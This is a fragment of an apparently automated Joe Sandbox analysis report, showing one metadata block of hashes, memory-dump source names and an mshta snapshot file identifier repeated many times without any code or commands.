                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
